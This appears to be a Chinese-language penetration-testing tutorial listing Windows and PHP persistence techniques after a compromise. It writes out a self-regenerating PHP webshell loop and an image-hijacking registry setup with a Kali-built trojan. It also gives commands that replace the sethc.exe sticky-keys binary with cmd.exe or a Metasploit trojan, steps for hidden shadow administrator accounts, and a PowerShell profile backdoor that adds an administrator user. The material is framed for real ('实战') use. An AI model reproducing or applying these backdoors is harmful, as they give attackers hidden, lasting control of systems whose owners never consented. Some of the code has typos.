1.php不死马权限维持
<?php
ignore_user_about();//关掉浏览器,php脚本也能执行
set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去
$interval=5;//每五秒运行
do{
$filename='test.php';
if(file_exists($filename)){
echo 'xxx';//如果文件存在,输出xxx
}
else{
$file=fopen("test.php","w");//打开文件
$txt='<?php phpinfo();?>';//一句话木马
fwrite($file,$txt);//写入一句话木马
fclose($file);//关闭文件
}
sleep($interval);//延迟五秒执行
}while(ture):
?>
二、映像劫持技术
在注册表中找到
KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options
创建一个文件夹名为shell.exe将名称设置为Debuger值 并将shell.exe程序的运行路径写上去
kali制作exe木马并开启监听,放入靶机
双击访问
拿到权限
三、测量组脚本维权
输入gpedit.msc打开组策略,打开windows设置,脚本启动开关,添加脚本名
将脚本路径放入里面并创建1.txt,并双击bat脚本,重新启动
脚本内容
@echo off
systeminfo > 1.txt
四、粘滞键shift留后门
连续按五次shift
首先 更改sethc.exe(c:windowssystem32sethc.exe)拥有者 为administrator
move C:\windows\system32\sethc.exe C:\windows\system32\sethc.exe.bak#将粘滞键备份
Copy C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe#将cmd.exe重命名为粘滞键的启动程序
连续按五次shift即可打开cmd
知识延申将msf生成的木马,将exe木马放到同一目录下
Copy C:\windows\system32\aaa.exe C:\windows\system32\sethc.exe#覆盖粘滞键
五、建立影子账号
1.新建以$开头的账户
2.在注册表中找到隐藏账户的相关信息
3.备份影子账户
4.用命令删除影子账户
5.导入备份文件
6.注册表复制管理员权限
六、powershell配置文件
Powershell配置文件其实就是一个powershell脚本,他可以在每次运行powershell的时候自动运行,所 以可以通过向该文件写入自定义的语句用来长期维持权限。
依次输入以下命令,查看当前是否存在配置文件。
echo $profile
Test-path $profile
如果返回false则需要创建一个
New-Item -Path $profile -Type File –Force
然后写入命令,这里我以创建一个用户为目标,也可以写成反弹shell的,因为之前测试过程中写入过数 据,所以这里我是三条内容。
1.bat内容
net user moon 123456 /add & net localgroup administrators moon /add
这里的C:\1.bat是我的后门文件位置,实战情况下,各位需要按照实际文件路径来修改
$string = 'Start-Process "C:\1.bat"'
$string | Out-File -FilePath $profile -Append
more $profile
重新打开powershell就会自动执行